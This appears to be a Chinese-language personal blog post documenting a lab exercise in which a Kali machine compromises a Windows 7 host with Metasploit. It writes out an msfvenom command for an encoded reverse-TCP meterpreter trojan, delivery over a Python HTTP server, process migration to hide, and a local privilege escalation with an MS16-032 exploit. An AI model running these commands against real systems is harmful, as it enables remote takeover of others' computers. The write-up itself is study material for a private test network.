后渗透获得一个普通session

学习学习

Posted by lll-yz on May 28, 2021

实验环境:

A:Kali 192.168.78.131 攻击机

B:win7 192.168.78.128 受害机

先来一个简单的拿 shell 吧

1.在Kali开启 MSF

2.进入监听模块

use exploit/multi/handler

3.利用 msfvenom 制作木马程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.78.131 lport=4444 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe

参数说明:

  • -p payload
  • -e:编码方式。
  • -i:编码次数。
  • -b:在生成的程序中避免出现的值。
  • -f exe: 生成 exe 格式。

  • -a:代表系统结构,需要和攻击机一样。
  • -platform:平台选择 Windows
  • -p windows/meterpreter/reverse_tcp 反弹

2FhEJU.png

4.将木马传到主机:

这里使用 python2: python -m SimpleHTTPServer port python3:python -m http.server port 搭建一个HTTP服务,提供一个文件浏览的web页面到某端口。

2FhjTx.png

在访问下载期间会有回显。

5.打开目标机,进入搭建地址下载木马:

2Fh5kV.png

6.返回第二步界面,设置监听主机

set lhost 192.168.78.131

7.查看配置

show options

2F4mh8.png

在设置一个 payload:

set payload windows/meterpreter/reverse_tcp

再看看选项:

2AbQR1.png

8.运行:run 或 exploit

2F4R3D.png

9.在 win7 中运行我们的 msf.exe 木马,再次查看 msf 控制台

2AbYZD.png

可以看到得到了session。

10.查看 session,如果此时是 meterpreter,输入 background 即可返回 msf exploit(multi/handler)。

2kVIUA.png

2Abbo4.png

这样我们就得到了一个普通的 session。

在 meterpreter 中看看身份:

2AbDQP.png

在 background 返回 msf 界面后,可以 sessions 查看进程,然后 session -i id 来进入 meterpreter 界面。再输入 shell 可以进入 win7 的 shell。

2AqPTe.png

当我们拿到 shell 后显示乱码,可以:

chcp 65001

隐藏自己 + 提权

隐藏自己

ps 查看当前所有的会话进程。

再用 migrate 1844 将进程迁移到会话对应的 id。

(目前不懂)

提权

返回 msf,使用 post/multi/recon/local_exploit_suggester 模块,查找目标机器未修补的漏洞:

use post/multi/recon/local_exploit_suggester

设置要攻击的会话 id:

set session 1
run

绿色代表对应的漏洞:

2AXUnP.png

利用现有的漏洞提权 (复制冒号之前的就可以,如 👇)

2AjCjI.png

#有的漏洞会失败,多试几个 成功后会返回 shell,否则就是失败了
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
show options
set session 2
run

2Ajg8H.png

再次查看我们的权限,可以看到提权成功。

提权详情 ——> here